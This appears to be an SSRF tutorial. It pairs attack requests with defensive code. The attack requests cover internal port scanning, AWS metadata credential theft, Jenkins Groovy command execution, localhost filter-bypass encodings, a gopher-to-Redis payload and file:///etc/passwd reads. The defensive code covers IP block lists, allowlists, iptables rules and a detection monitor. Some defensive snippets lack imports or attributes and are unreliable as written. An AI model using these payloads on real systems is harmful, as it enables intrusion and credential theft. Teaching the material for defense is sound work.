Server-Side Request Forgery (SSRF) is a critical web application vulnerability that occurs when an attacker can induce a server-side application to make HTTP requests to arbitrary domains of the attacker’s choosing. This vulnerability enables attackers to bypass network access controls, scan internal networks, access cloud metadata services, and interact with internal services that are not directly accessible from the internet.
Attack Methodology: SSRF exploits applications that fetch remote resources based on user-supplied URLs. Attackers leverage this functionality to:
- Network Reconnaissance: Scan internal network infrastructure and identify services
- Cloud Metadata Exploitation: Access AWS EC2 metadata, Azure Instance Metadata Service
- Internal Service Interaction: Communicate with databases, admin panels, and APIs
- Port Scanning: Enumerate open ports on internal systems
- File System Access: Read local files through file:// protocol handlers
- Firewall Bypass: Access services protected by perimeter security controls
Common Vulnerable Patterns:
- URL parameter fetching (
?url=https://example.com
) - Webhook endpoints accepting callback URLs
- Image processing services accepting remote image URLs
- Document converters fetching remote resources
- Social media preview generation
- RSS feed readers and aggregators
Basic SSRF Exploitation:
Vulnerable application endpoint:
GET /fetch?url=https://example.com HTTP/1.1
Host: vulnerable-app.com
User-Agent: Mozilla/5.0...
Internal Network Reconnaissance: Attackers enumerate internal network ranges to discover running services:
GET /fetch?url=http://192.168.1.1 HTTP/1.1
Host: vulnerable-app.com
GET /fetch?url=http://10.0.0.1:8080 HTTP/1.1
Host: vulnerable-app.com
GET /fetch?url=http://172.16.0.1:3306 HTTP/1.1
Host: vulnerable-app.com
Response Analysis:
- 200 OK: Service is running and accessible
- Connection Timeout: Host exists but port is filtered/closed
- Connection Refused: Host exists but service is not running
- DNS Resolution Error: Host does not exist
Internal Service Discovery and Exploitation:
Organizations commonly deploy internal services on private IP ranges:
- 10.0.0.0/8 (Class A private networks)
- 172.16.0.0/12 (Class B private networks)
- 192.168.0.0/16 (Class C private networks)
Administrative Interface Access:
GET /fetch?url=http://10.0.0.5:8080/admin HTTP/1.1
Host: vulnerable-app.com
Common Internal Service Ports:
# Database services
3306 (MySQL), 5432 (PostgreSQL), 1521 (Oracle), 27017 (MongoDB)
# Web services
80 (HTTP), 443 (HTTPS), 8080 (Alt HTTP), 9200 (Elasticsearch)
# Admin interfaces
8443 (Admin HTTPS), 9090 (Prometheus), 3000 (Grafana)
# Container orchestration
6443 (Kubernetes API), 2376 (Docker), 8500 (Consul)
Exploitation Example - Jenkins Admin Panel:
GET /fetch?url=http://10.0.0.5:8080/jenkins/script HTTP/1.1
Host: vulnerable-app.com
If Jenkins script console is accessible without authentication:
// Remote code execution via Groovy script
println "whoami".execute().text
println "ls -la /etc/passwd".execute().text
Cloud Infrastructure Exploitation:
AWS EC2 Instance Metadata Service (IMDS):
GET /fetch?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
Host: vulnerable-app.com
Metadata Enumeration Sequence:
# 1. Discover available metadata endpoints
/latest/meta-data/
/latest/meta-data/iam/
/latest/meta-data/iam/security-credentials/
# 2. Extract IAM role credentials
/latest/meta-data/iam/security-credentials/EC2-Role-Name
# 3. Retrieve temporary AWS credentials
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "2024-01-15T12:00:00Z"
}
Kubernetes API Server Exploitation:
GET /fetch?url=https://10.0.0.1:6443/api/v1/namespaces HTTP/1.1
Host: vulnerable-app.com
GET /fetch?url=https://10.0.0.1:6443/api/v1/pods HTTP/1.1
Host: vulnerable-app.com
Container Runtime APIs:
# Docker API (typically on port 2375/2376)
GET /fetch?url=http://localhost:2375/containers/json HTTP/1.1
# Extract container information
GET /fetch?url=http://localhost:2375/containers/container_id/json HTTP/1.1
Cloud Provider Metadata Services:
# AWS
http://169.254.169.254/latest/meta-data/
# Azure
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# Google Cloud
http://metadata.google.internal/computeMetadata/v1/
Localhost/Loopback Interface Exploitation:
Many applications implement IP-based access controls that only allow localhost connections:
Admin Panel Bypass:
GET /fetch?url=http://127.0.0.1/admin HTTP/1.1
Host: vulnerable-app.com
GET /fetch?url=http://localhost:8080/management HTTP/1.1
Host: vulnerable-app.com
Alternative Localhost Representations:
# Standard loopback
127.0.0.1, localhost
# Alternative representations
127.1, 127.0.1, 0.0.0.0, 0, 0x7f000001
# IPv6 loopback
::1, ::ffff:127.0.0.1
# Domain-based bypasses
localtest.me, 127.0.0.1.nip.io, localhost.localdomain
Internal Service Interaction:
# Redis (default port 6379)
GET /fetch?url=http://127.0.0.1:6379/ HTTP/1.1
# Memcached (default port 11211)
GET /fetch?url=http://127.0.0.1:11211/ HTTP/1.1
# Internal monitoring endpoints
GET /fetch?url=http://127.0.0.1:9090/metrics HTTP/1.1
Protocol Smuggling Examples:
# Gopher protocol for raw TCP
GET /fetch?url=gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aeval%0d%0a HTTP/1.1
# File protocol for local file access
GET /fetch?url=file:///etc/passwd HTTP/1.1
Comprehensive Prevention Strategies
1. Network-Level Access Controls
IP Address Blacklisting:
import ipaddress
import re
class SSRFProtection:
def __init__(self):
self.blocked_networks = [
ipaddress.ip_network('127.0.0.0/8'), # Loopback
ipaddress.ip_network('10.0.0.0/8'), # Private Class A
ipaddress.ip_network('172.16.0.0/12'), # Private Class B
ipaddress.ip_network('192.168.0.0/16'), # Private Class C
ipaddress.ip_network('169.254.0.0/16'), # Link-local
ipaddress.ip_network('224.0.0.0/4'), # Multicast
ipaddress.ip_network('240.0.0.0/4'), # Reserved
]
self.blocked_ports = [22, 23, 25, 53, 135, 139, 445, 1433, 1521, 3306, 5432, 6379, 11211]
def is_safe_url(self, url):
try:
parsed = urllib.parse.urlparse(url)
# Block non-HTTP protocols
if parsed.scheme not in ['http', 'https']:
return False
# Resolve hostname to IP
ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
# Check against blocked networks
for network in self.blocked_networks:
if ip in network:
return False
# Check blocked ports
port = parsed.port or (80 if parsed.scheme == 'http' else 443)
if port in self.blocked_ports:
return False
return True
except (ValueError, socket.gaierror):
return False
2. URL Validation and Allowlisting
Strict Domain Allowlisting:
import re
from urllib.parse import urlparse
class URLValidator:
def __init__(self):
self.allowed_domains = [
'api.example.com',
'cdn.example.com',
'trusted-partner.com'
]
self.allowed_protocols = ['http', 'https']
def validate_url(self, url):
"""Validate URL against allowlist and security rules."""
try:
parsed = urlparse(url)
# Protocol validation
if parsed.scheme not in self.allowed_protocols:
raise ValueError(f"Protocol {parsed.scheme} not allowed")
# Domain validation
if parsed.netloc not in self.allowed_domains:
raise ValueError(f"Domain {parsed.netloc} not in allowlist")
# Path validation - prevent path traversal
if '../' in parsed.path or '..\\' in parsed.path:
raise ValueError("Path traversal detected")
# Query parameter validation
if any(keyword in parsed.query.lower() for keyword in ['localhost', '127.0.0.1', 'file://']):
raise ValueError("Suspicious query parameters")
return True
except Exception as e:
self.log_security_event('url_validation_failed', url, str(e))
return False
3. Proxy-Based Request Routing
Secure HTTP Proxy Implementation:
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
class SecureHTTPClient:
def __init__(self):
self.session = requests.Session()
# Configure timeouts and retries
retry_strategy = Retry(
total=3,
status_forcelist=[429, 500, 502, 503, 504],
method_whitelist=["HEAD", "GET", "OPTIONS"]
)
adapter = HTTPAdapter(max_retries=retry_strategy)
self.session.mount("http://", adapter)
self.session.mount("https://", adapter)
# Set security headers
self.session.headers.update({
'User-Agent': 'SecureApp/1.0',
'Accept': 'application/json,text/html',
'Cache-Control': 'no-cache'
})
def fetch_url(self, url, timeout=10):
"""Safely fetch external URL with comprehensive protection."""
# Validate URL first
if not self.url_validator.validate_url(url):
raise SecurityError("URL failed validation")
try:
response = self.session.get(
url,
timeout=timeout,
allow_redirects=False, # Prevent redirect-based bypasses
verify=True, # Verify SSL certificates
stream=False # Load entire response into memory
)
# Validate response size
if len(response.content) > 5 * 1024 * 1024: # 5MB limit
raise ValueError("Response too large")
# Validate content type
content_type = response.headers.get('content-type', '')
if not any(allowed in content_type for allowed in ['application/json', 'text/html', 'text/plain']):
raise ValueError("Invalid content type")
return response
except requests.exceptions.RequestException as e:
self.log_security_event('http_request_failed', url, str(e))
raise SecurityError("Request failed security check")
4. Network Segmentation and Firewall Rules
iptables Rules for SSRF Prevention:
#!/bin/bash
# Block outbound connections to internal networks from web application
iptables -A OUTPUT -s 10.0.1.100 -d 127.0.0.0/8 -j DROP
iptables -A OUTPUT -s 10.0.1.100 -d 10.0.0.0/8 -j DROP
iptables -A OUTPUT -s 10.0.1.100 -d 172.16.0.0/12 -j DROP
iptables -A OUTPUT -s 10.0.1.100 -d 192.168.0.0/16 -j DROP
iptables -A OUTPUT -s 10.0.1.100 -d 169.254.0.0/16 -j DROP
# Block cloud metadata services
iptables -A OUTPUT -s 10.0.1.100 -d 169.254.169.254 -j DROP
# Allow only specific external destinations
iptables -A OUTPUT -s 10.0.1.100 -d api.example.com -j ACCEPT
iptables -A OUTPUT -s 10.0.1.100 -d cdn.example.com -j ACCEPT
# Log and drop all other outbound traffic
iptables -A OUTPUT -s 10.0.1.100 -j LOG --log-prefix "SSRF_ATTEMPT: "
iptables -A OUTPUT -s 10.0.1.100 -j DROP
5. Advanced Detection and Monitoring
Real-time SSRF Detection:
import asyncio
import aiohttp
from collections import defaultdict
from datetime import datetime, timedelta
class SSRFMonitor:
def __init__(self):
self.request_log = defaultdict(list)
self.blocked_ips = set()
async def monitor_request(self, source_ip, target_url, user_agent):
"""Monitor and analyze outbound requests for SSRF patterns."""
current_time = datetime.now()
# Log the request
self.request_log[source_ip].append({
'timestamp': current_time,
'target': target_url,
'user_agent': user_agent
})
# Analyze patterns
recent_requests = [
req for req in self.request_log[source_ip]
if current_time - req['timestamp'] < timedelta(minutes=5)
]
# Detect rapid internal network scanning
internal_targets = [
req['target'] for req in recent_requests
if any(net in req['target'] for net in ['127.0.0.1', '192.168.', '10.', '172.'])
]
if len(internal_targets) > 10:
await self.alert_security_team(
f"Potential SSRF attack from {source_ip}: {len(internal_targets)} internal requests"
)
self.blocked_ips.add(source_ip)
# Detect metadata service access attempts
if '169.254.169.254' in target_url:
await self.alert_security_team(
f"Critical: Metadata service access attempt from {source_ip}"
)
self.blocked_ips.add(source_ip)
async def alert_security_team(self, message):
"""Send real-time security alerts."""
webhook_url = "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
payload = {
"text": f"🚨 SSRF Alert: {message}",
"channel": "#security-alerts",
"username": "SSRF Monitor"
}
async with aiohttp.ClientSession() as session:
await session.post(webhook_url, json=payload)